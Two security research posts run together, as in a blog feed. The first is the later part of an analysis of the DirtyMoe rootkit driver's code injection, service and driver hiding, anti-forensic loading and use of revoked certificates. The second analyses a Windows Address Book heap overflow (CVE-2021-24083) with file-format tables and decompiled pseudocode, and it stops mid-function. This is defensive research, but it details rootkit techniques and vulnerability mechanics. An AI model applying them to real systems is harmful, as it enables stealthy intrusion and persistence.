The first step to the process injection is to find free memory for a code cave. The driver finds the free memory near the NtTestAlert() routine address. The code cave includes a shellcode as Figure 6. demonstrates.

Figure 6. Malicious payload overwriting the original NtTestAlert() routine

The shellcode prepares a parameter (code_cave address) for the malicious code and then jumps into it. The original NtTestAlert() address is moved into rax because the malicious code ends by the return instruction, and therefore the original NtTestAlert() is invoked. Finally, rdx contains the jump address, where the driver injected the malicious code. The next item of the code cave is a path to the DLL file, which shall be loaded into the injected process. Other items of the code cave are the original address and original code instructions of the NtTestAlert().

The driver writes the malicious code into the address defined in dll_loading_shellcode. The original instructions of NtTestAlert() are rewritten with the instruction which just jumps to the shellcode. It causes that when the NtTestAlert() is called, the shellcode is activated and jumps into the malicious code.

Malicious Code x64

The malicious code for x64 is simple. Firstly, it recovers the original instruction of the rewritten NtTestAlert() code. Secondly, the code invokes the found LdrLoadDll() method and loads appropriate DLL into the address space of the injected process. Finally, the code executes the return instruction and jumps back to the original NtTestAlert() function.

The x86 OS version abuses the entry point of the injected process directly. The procedure is very similar to the x64 injection, and the x86 malicious code is also identical to the x64 version. However, the x86 malicious code needs to find a 32bit variant of the  LdrLoadDll() method. It uses the similar technique described above (NtTestAlert and LdrLoadDll Lookup).

2.8 Service Hiding

Windows uses the Services Control Manager (SCM) to manage the system services. The executable of SCM is services.exe. This program runs at the system startup and performs several functions, such as running, ending, and interacting with system services. The SCM process also keeps all run services in an undocumented service record (SERVICE_RECORD) structure.

The driver must patch the service record to hide a required service. Firstly, the driver must find the process services.exe and attach it to this one via KeStackAttachProcess(). The malware author defined a byte sequence which the driver looks for in the process memory to find the service record. The services.exe keeps all run services as a linked list of SERVICE_RECORD [5]. The malware driver iterates this list and unlinks required services defined by listServices whitelist; see Table 4.

The used byte sequence for Windows 2000, XP, Vista, and Windows 7 is as follows: {45 3B E5 74 40 48 8D 0D}. There is another byte sequence {48 83 3D ?? ?? ?? ?? ?? 48 8D 0D} that is never used because it is bound to the Windows version that the malware driver has never identified; maybe in development.

The hidden services cannot be detected using PowerShell command Get-Service, Windows Task Manager, Process Explorer, etc. However, started services are logged via Windows Event Log. Therefore, we can enumerate all regular services and all logged services. Then, we can create differences to find hidden services.

2.9 Driver Hiding

The driver is able to hide itself or another malicious driver based on the IOCTL from the user-mode. The Driver Entry is initiated by a parameter representing a driver object (DRIVER_OBJECT) of the loaded driver image. The driver object contains an officially undocumented item called a driver section. The LDR_DATA_TABLE_ENTRY kernel structure stores information about the loaded driver, such as base/entry point address, image name, image size, etc. The driver section points to LDR_DATA_TABLE_ENTRY as a double-linked list representing all loaded drivers in the system.

When a user-mode application lists all loaded drivers, the kernel enumerates the double-linked list of the LDR_DATA_TABLE_ENTRY structure. The malware driver iterates the whole list and unlinks items (drivers) that should be hidden. Therefore, the kernel loses pointers to the hidden drivers and cannot enumerate all loaded drivers [6].

2.10 Driver Unload

The Driver Unload function contains suspicious code, but it seems to be never used in this version. The rest of the unload functionality executes standard procedure to unload the driver from the system.

3. Loading Driver During Boot

The DirtyMoe service loads the malicious driver. A driver image is not permanently stored on a disk since the service always extracts, loads, and deletes the driver images on the service startup. The secondary service aim is to eliminate evidence about driver loading and eventually complicate a forensic analysis. The service aspires to camouflage registry and disk activity. The DirtyMoe service is registered as follows:

Service name: Ms<volume_id>App; e.g., MsE3947328App
Registry key: HKLM\SYSTEM\CurrentControlSet\services\<service_name>
ImagePath: %SystemRoot%\system32\svchost.exe -k netsvcs
ServiceDll: C:\Windows\System32\<service_name>.dll, ServiceMain
ServiceType: SERVICE_WIN32_SHARE_PROCESS
ServiceStart: SERVICE_AUTO_START

3.1 Registry Operation

On startup, the service creates a registry record, describing the malicious driver to load; see following example:

Registry key: HKLM\SYSTEM\CurrentControlSet\services\dump_E3947328
ImagePath: \??\C:\Windows\System32\drivers\dump_LSI_FC.sys
DisplayName: dump_E3947328

At first glance, it is evident that ImagePath does not reflect DisplayName, which is the Windows common naming convention. Moreover, ImagePath prefixed with dump_ string is used for virtual drivers (loaded only in memory) managing the memory dump during the Windows crash. The malware tries to use the virtual driver name convention not to be so conspicuous. The principle of the Dump Memory using the virtual drivers is described in [7, 8].

ImagePath values are different from each windows reboot, but it always abuses the name of the system native driver; see a few instances collected during windows boot: dump_ACPI.sys, dump_RASPPPOE.sys, dump_LSI_FC.sys, dump_USBPRINT.sys, dump_VOLMGR.sys, dump_INTELPPM.sys, dump_PARTMGR.sys

3.2 Driver Loading

When the registry entry is ready, the DirtyMoe service dumps the driver into the file defined by ImagePath. Then, the service loads the driver via ZwLoadDriver().

3.3 Evidence Cleanup

When the driver is loaded either successfully or unsuccessfully, the DirtyMoe service starts to mask various malicious components to protect the whole malware hierarchy.

The DirtyMoe service removes the registry key representing the loaded driver; see Registry Operation. Further, the loaded driver hides the malware services, as the Service Hiding section describes. Registry entries related to the driver are removed via the API call. Therefore, a forensics track can be found in the SYSTEM registry HIVE, located in %SystemRoot%\system32\config\SYSTEM. The API call just removes a relevant HIVE pointer, but unreferenced data is still present in the HIVE stored on the disk. Hence, we can read removed registry entries via RegistryExplorer.

The loaded driver also removes the dumped (dump_ prefix) driver file. We were not able to restore this file via tools enabling recovery of deleted files, but it was extracted directly from the service DLL file.

Capturing driver image and register keys

The malware service is responsible for the driver loading and cleans up of loading evidence. We put a breakpoint into the nt!IopLoadDriver() kernel method, which is reached if a process wants to load a driver into the system. We waited for the wanted driver, and then we listed all the system processes. The corresponding service (svchost.exe) has a call stack that contains the kernel call for driver loading, but the corresponding service has been killed by EIP registry modifying. The process (service) was killed, and the whole Windows ended in BSoD. Windows made a crash dump, so the file system caches have been flushed, and the malicious service did not finish the cleanup in time. Therefore, we were able to mount a volume and read all wanted data.

3.4 Forensic Traces

Although the DirtyMoe service takes great pains to cover up the malicious activities, there are a few aspects that help identify the malware.

The DirtyMoe service and loaded driver itself are hidden; however, the Windows Event Log system records information about started services. Therefore, we can get additional information such as ProcessID and ThreadID of all services, including the hidden services.

WinDbg connected to the Windows kernel can display all loaded modules using the lm command. The module list can uncover non-virtual drivers with prefix dump_ and identify the malicious drivers.

Offline connected volume can provide the DLL library of the services and other supporting files, which are unfortunately encrypted and obfuscated with VMProtect. Finally, the offline SYSTEM registry stores records of the DirtyMoe service.

4. Certificates

Windows Vista and later versions of Windows require that loaded drivers must be code-signed. The digital code-signature should verify the identity and integrity of the driver vendor [9]. However, Windows does not check the current status of all certificates signing a Windows driver. So, if one of the certificates in the path is expired or revoked, the driver is still loaded into the system. We will not discuss why Windows loads drivers with invalid certificates since this topic is really wide. The backward compatibility but also a potential impact on the kernel implementation play a role.

DirtyMoe drivers are signed with three certificates as follow:

Beijing Kate Zhanhong Technology Co.,Ltd.
Valid From: 28-Nov-2013 (2:00:00)
Valid To: 29-Nov-2014 (1:59:59)
SN: 3C5883BD1DBCD582AD41C8778E4F56D9
Thumbprint: 02A8DC8B4AEAD80E77B333D61E35B40FBBB010A0
Revocation Status: Revoked on 22-May-‎2014 (9:28:59)

Beijing Founder Apabi Technology Limited
Valid From: 22-May-2018 (2:00:00)
Valid To: 29-May-2019 (14:00:00)
SN: 06B7AA2C37C0876CCB0378D895D71041
Thumbprint: 8564928AA4FBC4BBECF65B402503B2BE3DC60D4D
Revocation Status: Revoked on 22-May-‎2018 (2:00:01)

Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Valid From: 23-Mar-2011 (2:00:00)
Valid To: 23-Mar-2012 (1:59:59)
SN: 5F78149EB4F75EB17404A8143AAEAED7
Thumbprint: 31E5380E1E0E1DD841F0C1741B38556B252E6231
Revocation Status: Revoked on 18-Apr-‎2011 (10:42:04)

The certificates have been revoked by their certification authorities, and they are registered as stolen, leaked, misuse, etc. [10]. Although all certificates have been revoked in the past, Windows loads these drivers successfully because the root certificate authorities are marked as trusted.

5. Summarization and Discussion

We summarize the main functionality of the DirtyMoe driver. We discuss the quality of the driver implementation, anti-forensic mechanisms, and stolen certificates for successful driver loading.

5.1 Main Functionality

Authorization

The driver is controlled via IOCTL codes which are sent by malware processes in the user-mode. However, the driver implements the authorization instrument, which verifies that the IOCTLs are sent by authenticated processes. Therefore, not all processes can communicate with the driver.

Affecting the Filesystem

If a rootkit is in the kernel, it can do “anything”. The DirtyMoe driver registers itself in the filter manager and begins to influence the results of filesystem I/O operations; in fact, it begins to filter the content of the filesystem. Furthermore, the driver replaces the NtfsCreatCallback() callback function of the NTFS driver, so the driver can determine who should gain access and what should not get to the filesystem.

Thread Monitoring and Code injection

The DirtyMoe driver enrolls a malicious routine which is invoked if the system creates a new thread. The malicious routine abuses the APC kernel mechanism to execute the malicious code. It loads arbitrary DLL into the new thread. 

Registry Hiding

This technique abuses the kernel hook method that indexes registry keys in HIVE. The code execution of the hook method is redirected to the malicious routine so that the driver can control the indexing of registry keys. Actually, the driver can select which keys will be indexed or not.

Service and Driver Hiding

Patching of specific kernel structures causes that certain API functions do not enumerate all system services or loaded drivers. Windows services and drivers are stored as a double-linked list in the kernel. The driver corrupts the kernel structures so that malicious services and drivers are unlinked from these structures. Consequently, if the kernel iterates these structures for the purpose of enumeration, the malicious items are skipped.

5.2 Anti-Forensic Technique

As we mentioned above, the driver is able to hide itself. But before driver loading, the DirtyMoe service must register the driver in the registry and dump the driver into the file. When the driver is loaded, the DirtyMoe service deletes all registry entries related to the driver loading. The driver deletes its own file from the file system through the kernel-mode. Therefore, the driver is loaded in the memory, but its file is gone.

The DirtyMoe service removes the registry entries via standard API calls. We can restore this data from the physical storage since the API calls only remove the pointer from HIVE. The dumped driver file is never physically stored on the disk drive because its size is too small and is present only in cache memory. Accordingly, the file is removed from the cache before cache flushing to the disk, so we cannot restore the file from the physical disk.

5.3 Discussion

The whole driver serves as an all-in-one super rootkit package. Any malware can register itself in the driver if knowing the authorization code. After successful registration, the malware can use a wide range of driver functionality. Hypothetically, the authorization code is hardcoded, and the driver’s name can be derived so we can communicate with the driver and stop it.

The system loads the driver via the DirtyMoe service within a few seconds. Moreover, the driver file is never present in the file system physically, only in the cache. The driver is loaded via the API call, and the DirtyMoe service keeps a handler of the driver file, so the file manipulation with the driver file is limited. However, the driver removes its own file using kernel-call. Therefore, the driver file is removed from the file system cache, and the driver handler is still relevant, with the difference that the driver file does not exist, including its forensic traces.

The DirtyMoe malware is written using Delphi in most cases. Naturally, the driver is coded in native C. The code style of the driver and the rest of the malware is very different. We analyzed that most of the driver functionalities are downloaded from internet forums as public samples. Each implementation part of the driver is also written in a different style. The malware authors have merged individual rootkit functionality into one kit. They also merged known bugs, so the driver shows a few significant symptoms of driver presence in the system. The authors needed to adapt the functionality of the public samples to their purpose, but that has been done in a very dilettante way. It seems that the malware authors are familiar only with Delphi.

Finally, the code-signature certificates that are used have been revoked in the middle of their validity period. However, the certificates are still widely used for code signing, so the private keys of the certificates have probably been stolen or leaked. In addition, the stolen certificates have been signed by the certification authority which Microsoft trusts, so the certificates signed in this way can be successfully loaded into the system despite their revocation. Moreover, the trend in the use of certificates is growing, and predictions show that it will continue to grow in the future. We will analyze the problems of the code-signature certificates in the future post.

6. Conclusion

DirtyMoe driver is an advanced piece of rootkit that DirtyMoe uses to effectively hide malicious activity on host systems. This research was undertaken to inspect the rootkit functionally of the DirtyMoe driver and evaluate the impact on infected systems. This study set out to investigate and present the analysis of the DirtyMoe driver, namely its functionality, the ability to conceal, deployment, and code-signature.

The research has shown that the driver provides key functionalities to hide malicious processes, services, and registry keys. Another dangerous action of the driver is the injection of malicious code into newly created processes. Moreover, the driver also implements the minifilter, which monitors and affects I/O operations on the file system. Therefore, the content of the file system is filtered, and appropriate files/directories can be hidden for users. An implication of this finding is that malware itself and its artifacts are hidden even for AVs. More importantly, the driver implements another anti-forensic technique which removes the driver’s evidence from disk and registry immediately after driver loading. However, a few traces can be found on the victim’s machines.

This study has provided the first comprehensive review of the driver that protects and serves each malware service and process of the DirtyMoe malware. The scope of this study was limited in terms of driver functionality. However, further experimental investigations are needed to hunt out and investigate other samples that have been signed by the revoked certificates. Because of this, the malware author can be traced and identified using thus abused certificates.

IoCs

Samples (SHA-256)
550F8D092AFCD1D08AC63D9BEE9E7400E5C174B9C64D551A2AD19AD19C0126B1
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
B3B5FFF57040C801A4392DA2AF83F4BF6200C575AA4A64AB9A135B58AA516080
CB95EF8809A89056968B669E038BA84F708DF26ADD18CE4F5F31A5C9338188F9
EB29EDD6211836E6D1877A1658E648BEB749091CE7D459DBD82DC57C84BC52B1

References

[1] Kernel-Mode Driver Architecture
[2] Driver to Hide Processes and Files
[3] A piece of code to hide registry entries
[4] Hidden
[5] Opening Hacker’s Door
[6] Hiding loaded driver with DKOM
[7] Crashdmp-ster Diving the Windows 8 Crash Dump Stack
[8] Ghost drivers named dump_*.sys
[9] Driver Signing
[10] Australian web hosts hit with a Manic Menagerie of malware

Appendix A

Registry entries used in the Start Routine

\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceAddress
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNumber
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceId
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceName
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameOnly
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB_2


Appendix B

Example of registry entries configuring the driver

Key: ControlSet001\Control\WinApi
Value: WinDeviceAddress
Data: Ms312B9050App;   

Value: WinDeviceNumber
Data:
\WINDOWS\AppPatch\Ke601169.xsl;
\WINDOWS\AppPatch\Ke237043.xsl;
\WINDOWS\AppPatch\Ke311799.xsl;
\WINDOWS\AppPatch\Ke119163.xsl;
\WINDOWS\AppPatch\Ke531580.xsl;
\WINDOWS\AppPatch\Ke856583.xsl;
\WINDOWS\AppPatch\Ke999860.xsl;
\WINDOWS\AppPatch\Ke410472.xsl;
\WINDOWS\AppPatch\Ke673389.xsl;
\WINDOWS\AppPatch\Ke687417.xsl;
\WINDOWS\AppPatch\Ke689468.xsl;
\WINDOWS\AppPatch\Ac312B9050.sdb;
\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceName
Data:
C:\WINDOWS\AppPatch\Ac312B9050.sdb;
C:\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceId
Data: dump_FDC.sys;

The post DirtyMoe: Rootkit Driver appeared first on Avast Threat Labs.

Analysis of a Heap Buffer-Overflow Vulnerability in Microsoft Windows Address Book

By Eneko Cruz Elejalde

Overview

This post analyzes a heap-buffer overflow in Microsoft Windows Address Book. Microsoft released an advisory for this vulnerability for the 2021 February patch Tuesday. This post will go into detail about what Microsoft Windows Address Book is, the vulnerability itself, and the steps to craft a proof-of-concept exploit that crashes the vulnerable application.

Windows Address Book

Windows Address Book is a part of the Microsoft Windows operating system and is a service that provides users with a centralized list of contacts that can be accessed and modified by both Microsoft and third party applications. The Windows Address Book maintains a local database and interface for finding and editing information about contacts, and can query network directory servers using Lightweight Directory Access Protocol (LDAP). The Windows Address Book was introduced in 1996 and was later replaced by Windows Contacts in Windows Vista and subsequently by the People App in Windows 10.

The Windows Address Book provides an API that enables other applications to directly use its database and user interface services to enable services to access and modify contact information. While Microsoft has replaced the application providing the Address Book functionality, newer replacements make use of old functionality and ensure backwards compatibility. The Windows Address Book functionality is present in several Windows Libraries that are used by Windows 10 applications, including Outlook and Windows Mail. In this way, modern applications make use of the Windows Address Book and can even import address books from older versions of Windows.

CVE-2021-24083

A heap-buffer overflow vulnerability exists within the SecurityCheckPropArrayBuffer() function within wab32.dll when processing nested properties of a contact. The network-based attack vector involves enticing a user to open a crafted .wab file containing a malicious composite property in a WAB record.

Vulnerability

The vulnerability analysis that follows is based on Windows Address Book Contacts DLL (wab32.dll) version 10.0.19041.388 running on Windows 10 x64.

The Windows Address Book Contacts DLL (i.e. wab32.dll) provides access to the Address Book API and it is used by multiple applications to interact with the Windows Address Book. The Contacts DLL handles operations related to contact and identity management. Among others, the Contacts DLL is able to import an address book (i.e, a WAB file) exported from an earlier version of the Windows Address Book.

Earlier versions of the Windows Address Book maintained a database of identities and contacts in the form of a .wab file. While current versions of Windows do not use a .wab file by default anymore, they allow importing a WAB file from an earlier installation of the Windows Address Book.

There are multiple ways of importing a WAB file into the Windows Address Book, but it was observed that applications rely on the Windows Contacts Import Tool (i.e, C:\Program Files\Windows Mail\wabmig.exe) to import an address book. The Import Tool loads wab32.dll to handle loading a WAB file, extracting relevant contacts, and importing them into the Windows Address Book.

WAB File Format

The WAB file format (commonly known as Windows Address Book or Outlook Address Book) is an undocumented and proprietary file format that contains personal identities. Identities may in turn contain contacts, and each contact might contain one or more properties.

Although the format is undocumented, the file-format has been partially reverse-engineered by a third party. The following structures were obtained from a combination of a publicly available third-party application and the disassembly of wab32.dll. Consequently, there may be inaccuracies in structure definitions, field names, and field types.

The WAB file has the following structure:

Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    -------------------
0x0         16                Magic Number            Sixteen magic bytes
0x10        4                 Count 1                 Unknown Integer
0x14        4                 Count 2                 Unknown Integer
0x18        16                Table Descriptor 1      Table descriptor
0x28        16                Table Descriptor 2      Table descriptor
0x38        16                Table Descriptor 3      Table descriptor
0x48        16                Table Descriptor 4      Table descriptor
0x58        16                Table Descriptor 5      Table descriptor
0x68        16                Table Descriptor 6      Table descriptor

All multi-byte fields are represented in little-endian byte order unless otherwise specified. All string fields are in Unicode, encoded in the UTF16-LE format.

The Magic Number field contains the following sixteen bytes: 9c cb cb 8d 13 75 d2 11 91 58 00 c0 4f 79 56 a4. While some sources list the sequence of bytes 81 32 84 C1 85 05 D0 11 B2 90 00 AA 00 3C F6 76 as a valid magic number for a WAB file, it was found experimentally that replacing the sequence of bytes prevents the Windows Address Book from processing the file.

Each of the six Table Descriptor fields numbered 1 through 6 has the following structure:

Offset    Length    Field    Description
          (bytes)
-------   --------  -------  -------------------
0x0       4         Type     Type of table descriptor
0x4       4         Size     Size of the record described
0x8       4         Offset   Offset of the record described relative to the beginning of file
0xC       4         Count    Number of records present at offset

The following are examples of some known types of table descriptor:

  • Text Record (Type: 0x84d0): A record containing a Unicode string.
  • Index Record (Type: 0xFA0): A record that may contain several descriptors to WAB records.

Each text record has the following structure:

Offset   Length (bytes)    Field          Description
------   --------------    ------------   -------------------
0x0      N                 Content        Text content of the record; a null terminated UNICODE string
0x0+N    0x4               RecordId       A record identifier for the text record 

Similarly, each index record has the following structure

Offset      Length (bytes)    Field        Description
---------   --------------    ----------   -------------------
0x0         4                 RecordId     A record identifier for the index record
0x4         4                 Offset       Offset of the record relative to the beginning of the file

Each entry in the index record (i.e, each index record structure in succession) has an offset that points to a WAB record.

WAB Records

A WAB record is used to describe a contact. It contains fields such as email addresses and phone numbers stored in properties, which may be of various types such as string, integer, GUID, and timestamp. Each WAB record has the following structure:

Offset      Length   Field              Description
---------   ------   ---------------    -------------------
0x0         4        Unknown1           Unknown field
0x4         4        Unknown2           Unknown field
0x8         4        RecordId           A record identifier for the WAB record
0xC         4        PropertyCount      The number of properties contained in RecordProperties
0x10        4        Unknown3           Unknown field 
0x14        4        Unknown4           Unknown field 
0x18        4        Unknown5           Unknown field 
0x1C        4        DataLen            The length of the RecordProperties field (M)
0x20        M        RecordProperties   Succession of subproperties belonging to the WAB record

The following fields are relevant:

  • The RecordProperties field is a succession of record property structures.
  • The PropertyCount field indicates the number of properties within the RecordProperties field.

Record properties can be either simple or composite.

Simple Properties

Simple properties have the following structure:

Offset      Length (bytes)    Field       Description
---------   --------------    ---------   -------------------
0x0         0x2               Tag         A property tag describing the type of the contents
0x2         0x2               Unknown     Unknown field
0x4         0x4               Size        Size in bytes of Value member (X)
0x8         X                 Value       Property value or content

Tags of simple properties are smaller than 0x1000, and include the following:

Tag Name        Tag Value    Length      Description
                             (bytes)
---------       -----------  ---------   -------------------
PtypInteger16   0x00000002   2           A 16-bit integer
PtypInteger32   0x00000003   4           A 32-bit integer
PtypFloating32  0x00000004   4           A 32-bit floating point number
PtypFloating64  0x00000005   8           A 64-bit floating point number
PtypBoolean     0x0000000B   2           Boolean, restricted to 1 or 0
PtypString8     0x0000001E   Variable    A string of multibyte characters in externally specified
                                         encoding with terminating null character (single 0 byte)
PtypBinary      0x00000102   Variable    A COUNT field followed by that many bytes
PtypString      0x0000001F   Variable    A string of Unicode characters in UTF-16LE format encoding
                                         with terminating null character (0x0000).
PtypGuid        0x00000048   16          A GUID with Data1, Data2, and Data3 filds in little-endian
PtypTime        0x00000040   8           A 64-bit integer representing the number of 100-nanosecond
                                         intervals since January 1, 1601
PtypErrorCode   0x0000000A   4           A 32-bit integer encoding error information

Note the following:

  • The aforementioned list is not exhaustive. For more property tag definitions, see this.
  • The value of PtypBinary is prefixed by a COUNT field, which counts 16-bit words.
  • In addition to the above, the following properties also exist; their usage in WAB is unknown.
    • PtypEmbeddedTable (0x0000000D): The property value is a Component Object Model (COM) object.
    • PtypNull (0x00000001): None: This property is a placeholder.
    • PtypUnspecified (0x00000000): Any: this property type value matches any type;

Composite Properties

Composite properties have the following structure:

Offset  Length     Field             Description
        (bytes)
------  ---------  ----------------- -------------------
0x0     0x2        Tag               A property tag describing the type of the contents
0x2     0x2        Unknown           Unknown field
0x4     0x4        NestedPropCount   Number of nested properties contained in the current WAB property
0x8     0x4        Size              Size in bytes of Value member (X)
0xC     X          Value             Property value or content

Tags of composite properties are greater than or equal to 0x1000, and include the following:

Tag Name                Tag Value
---------               ----------
PtypMultipleInteger16   0x00001002
PtypMultipleInteger32   0x00001003
PtypMultipleString8     0x0000101E
PtypMultipleBinary      0x00001102
PtypMultipleString      0x0000101F
PtypMultipleGuid        0x00001048
PtypMultipleTime        0x00001040


The Value field of each composite property contains NestedPropCount number of Simple properties of the corresponding type.

In case of fixed-sized properties (PtypMultipleInteger16, PtypMultipleInteger32, PtypMultipleGuid, and PtypMultipleTime), the Value field of a composite property contains NestedPropCount number of the Value field of the corresponding Simple property.

For example, in a PtypMultipleInteger32 structure with NestedPropCount of 4:

  • The Size is always 16.
  • The Value contains four 32-bit integers.

In case of variable-sized properties (PtypMultipleString8, PtypMultipleBinary, and PtypMultipleString), the Value field of the composite property contains NestedPropCount number of Size and Value fields of the corresponding Simple property.

For example, in a PtypMultipleString structure with NestedPropCount of 2 containing the strings “foo” and “bar” in Unicode:

  • The Size is 14 00 00 00.
  • The Value field contains a concatenation of the following two byte-strings:
    • “foo” encoded with a four-byte length: 06 00 00 00 66 00 6f 00 6f 00.
    • “bar” encoded with a four-byte length: 06 00 00 00 62 00 61 00 72 00.

Technical Details

The vulnerability in question occurs when a malformed Windows Address Book in the form of a WAB file is imported. When a user attempts to import a WAB file into the Windows Address Book, the method WABObjectInternal::Import() is called, which in turn calls ImportWABFile(). For each contact inside the WAB file, ImportWABFile() performs the following nested calls: ImportContact(), CWABStorage::ReadRecord(), ReadRecordWithoutLocking(), and finally HrGetPropArrayFromFileRecord(). This latter function receives a pointer to a file as an argument and reads the contact header and extracts PropertyCount and DataLen. The function HrGetPropArrayFromFileRecord() in turn calls SecurityCheckPropArrayBuffer() to perform security checks upon the imported file and HrGetPropArrayFromBuffer() to read the contact properties into a property array.

The function HrGetPropArrayFromBuffer() relies heavily on the correctness of the checks performed by SecurityCheckPropArrayBuffer(). However, the function fails to implement security checks upon certain property types. Specifically, SecurityCheckPropArrayBuffer() may skip checking the contents of nested properties where the property tag is unknown, while the function HrGetPropArrayFromBuffer() continues to process all nested properties regardless of the security check. As a result, it is possible to trick the function HrGetPropArrayFromBuffer() into parsing an unchecked contact property. As a result of parsing such a property, the function HrGetPropArrayFromBuffer() can be tricked into overflowing a heap buffer.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference markers denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

The following is the pseudocode of the function HrGetPropArrayFromFileRecord:

[1]

if ( !(unsigned int)SecurityCheckPropArrayBuffer(wab_buffer_full, HIDWORD(uBytes[1]), wab_buffer[3]) )
  {

[2]
    result = 0x8004011b;        // Error
    goto LABEL_25;              // Return prematurely
  }

[3]
  result = HrGetPropArrayFromBuffer(wab_buffer_full, HIDWORD(uBytes[1]), wab_buffer[3], 0, a7);

At [1] the function SecurityCheckPropArrayBuffer() is called to perform a series of security checks upon the buffer received and the properties contained within. If the check is positive, then the input is trusted and processed by calling HrGetPropArrayFromBuffer() at [3]. Otherwise, the function returns with an error at [2].

The following is the pseudocode of the function SecurityCheckPropArrayBuffer():

    __int64 __fastcall SecurityCheckPropArrayBuffer(unsigned __int8 *buffer_ptr, unsigned int buffer_length, int header_dword_3)
    {
      unsigned int security_check_result; // ebx
      unsigned int remaining_buffer_bytes; // edi
      int l_header_dword_3; // er15
      unsigned __int8 *ptr_to_buffer; // r9
      int current_property_tag; // ecx
      __int64 c_dword_2; // r8
      unsigned int v9; // edi
      int VA; // ecx
      int VB; // ecx
      int VC; // ecx
      int VD; // ecx
      int VE; // ecx
      int VF; // ecx
      int VG; // ecx
      int VH; // ecx
      signed __int64 res; // rax
      _DWORD *ptr_to_dword_1; // rbp
      unsigned __int8 *ptr_to_dword_0; // r14
      unsigned int dword_2; // eax
      unsigned int v22; // edi
      int v23; // esi
      int v24; // ecx
      unsigned __int8 *c_ptr_to_property_value; // [rsp+60h] [rbp+8h]
      unsigned int v27; // [rsp+68h] [rbp+10h]
      unsigned int copy_dword_2; // [rsp+70h] [rbp+18h]

      security_check_result = 0;
      remaining_buffer_bytes = buffer_length;
      l_header_dword_3 = header_dword_3;
      ptr_to_buffer = buffer_ptr;
      if ( header_dword_3 )                      
      {
        while ( remaining_buffer_bytes > 4 )        
        {

[4]

          if ( *(_DWORD *)ptr_to_buffer & 0x1000 )  
          {

[5]

            current_property_tag = *(unsigned __int16 *)ptr_to_buffer;
            if ( current_property_tag == 0x1102 ||                    
                 (unsigned int)(current_property_tag - 0x101E) <= 1 ) 
            {                         

[6]
                                      
              ptr_to_dword_1 = ptr_to_buffer + 4;                     
              ptr_to_dword_0 = ptr_to_buffer;
              if ( remaining_buffer_bytes < 0xC )                     
                return security_check_result;                         
              dword_2 = *((_DWORD *)ptr_to_buffer + 2);
              v22 = remaining_buffer_bytes - 0xC;
              if ( dword_2 > v22 )                                     
                return security_check_result;                         
              ptr_to_buffer += 12;
              copy_dword_2 = dword_2;
              remaining_buffer_bytes = v22 - dword_2;
              c_ptr_to_property_value = ptr_to_buffer;                
              v23 = 0;                                                
              if ( *ptr_to_dword_1 > 0u )
              {
                while ( (unsigned int)SecurityCheckSingleValue(
                                        *(_DWORD *)ptr_to_dword_0,
                                        &c_ptr_to_property_value,
                                        ©_dword_2) )
                {
                  if ( (unsigned int)++v23 >= *ptr_to_dword_1 )       
                  {                                                   
                    ptr_to_buffer = c_ptr_to_property_value;
                    goto LABEL_33;
                  }
                }
                return security_check_result;
              }
            }
            else                                                         
            {
             
[7]

              if ( remaining_buffer_bytes < 0xC )
                return security_check_result;
              c_dword_2 = *((unsigned int *)ptr_to_buffer + 2);       
              v9 = remaining_buffer_bytes - 12;
              if ( (unsigned int)c_dword_2 > v9 )                     
                return security_check_result;                         
              remaining_buffer_bytes = v9 - c_dword_2;
              VA = current_property_tag - 0x1002;                     
              if ( VA )
              {
                VB = VA - 1;
                if ( VB && (VC = VB - 1) != 0 )
                {
                  VD = VC - 1;
                  if ( VD && (VE = VD - 1) != 0 && (VF = VE - 1) != 0 && (VG = VF - 13) != 0 && (VH = VG - 44) != 0 )
                    res = VH == 8 ? 16i64 : 0i64;
                  else
                    res = 8i64;
                }
                else
                {
                  res = 4i64;
                }
              }
              else
              {
                res = 2i64;
              }
              if ( (unsigned int)c_dword_2 / *((_DWORD *)ptr_to_buffer + 1) != res ) 
                return security_check_result;                                        
                                                                                     

              ptr_to_buffer += c_dword_2 + 12;
            }
          }
          else                                     
          {                                        

[8]

            if ( remaining_buffer_bytes < 4 )       
              return security_check_result;
